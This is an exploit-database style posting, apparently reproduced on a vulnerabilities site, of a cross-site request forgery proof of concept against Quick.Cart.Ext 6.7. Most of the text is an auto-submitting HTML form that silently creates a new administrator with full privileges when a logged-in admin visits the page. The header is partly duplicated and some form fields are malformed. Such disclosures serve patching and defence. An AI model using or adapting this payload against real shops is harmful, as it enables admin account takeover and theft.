Quick.Cart.Ext 6.7 Cross Site Request Forgery

Print
Vulnerabilities
Hits: 292
<!--
# Exploit Title: Quick.Cart.Ext <= v6.7 Remote Admin Add CSRF Exploit
# Exploit Author: s0nk3y
# Contact : s0nk3y at gmail com
# Google Dork: -
# Date: 22/06/20 <!--
# Exploit Title: Quick.Cart.Ext <= v6.7 Remote Admin Add CSRF Exploit
# Exploit Author: s0nk3y
# Contact : s0nk3y at gmail com
# Google Dork: -
# Date: 22/06/2016
# Vendor Homepage: https://opensolution.org
# Software Link: http://opensolution.org/download/home.html?sFile=Quick.Cart_v6.7.zip
# Version: 6.7
# Tested on: Ubuntu 16.04

Quick.Cart.Ext is vulnerable to CSRF attack (No CSRF token in place) meaning
that if an admin user can be tricked to visit a crafted URL created by
attacker (via spear phishing/social engineering), a form will be submitted
to (http://server/Quick.Cart.Ext/admin.php?p=admins-form) that will add a
new user as administrator.
Once exploited, the attacker can login to the admin panel (
http://localhost/Quick.Cart.Ext/admin.php)
using the username and the password he posted in the form.

CSRF PoC Code
=============
-->

<form method="post" action="http://server/Quick.Cart.Ext/admin.php?p=admins-form">
<input type="hidden" name="sLogin=attacker"/>
<input type="hidden" name="sPass" value="attacker"/>
<input type="hidden" name="sName" value="attacker"/>
<input type="hidden" name="sEmail" value="attacker@email.com"/>
<input type="hidden" name="iAdmin" value="2"/>
<input type="hidden" name="sOption=save+»"/>
<input type="hidden" name="aPrivilagesForm[products-list]" value="1"/>
<input type="hidden" name="aPrivilagesForm[products-form]" value="1"/>
<input type="hidden" name="aPrivilagesForm[products-delete]" value="1"/>
<input type="hidden" name="aPrivilagesForm[products-export]" value="1"/>
<input type="hidden" name="aPrivilagesForm[products-import]" value="1"/>
<input type="hidden" name="aPrivilagesForm[orders-list]" value="1"/>
<input type="hidden" name="aPrivilagesForm[orders-form]" value="1"/>
<input type="hidden" name="aPrivilagesForm[orders-delete]" value="1"/>
<input type="hidden" name="aPrivilagesForm[pages-list]" value="1"/>
<input type="hidden" name="aPrivilagesForm[pages-form]" value="1"/>
<input type="hidden" name="aPrivilagesForm[pages-delete]" value="1"/>
<input type="hidden" name="aPrivilagesForm[shipping]" value="1"/>
<input type="hidden" name="aPrivilagesForm[payments]" value="1"/>
<input type="hidden" name="aPrivilagesForm[tools-config]" value="1"/>
<input type="hidden" name="aPrivilagesForm[admins]" value="1"/>
<input type="hidden" name="aPrivilagesForm[lang]" value="1"/>
<input type="hidden" name="aPrivilagesForm[backup-list]" value="1"/>
<input type="hidden" name="aPrivilagesForm[backup-create]" value="1"/>
<input type="hidden" name="aPrivilagesForm[fixes]" value="1"/>
<input type="hidden" name="aPrivilagesForm[plugins]" value="1"/>
<input type="hidden" name="aPrivilagesForm[boxes]" value="1"/>
<input type="hidden" name="aPrivilagesForm[vouchers]" value="1"/>
<input type="hidden" name="aPrivilagesForm[features]" value="1"/>
<input type="hidden" name="aPrivilagesForm[products-comments-list]" value="1"/>
<input type="hidden" name="aPrivilagesForm[pages-comments-list]" value="1"/>
<input type="hidden" name="aPrivilagesForm[comments-delete]" value="1"/>
<input type="hidden" name="aPrivilagesForm[users]" value="1"/>
<input type="hidden" name="iStatus" value="1"/>
</form>
<script>
document.forms[0].submit();
</script>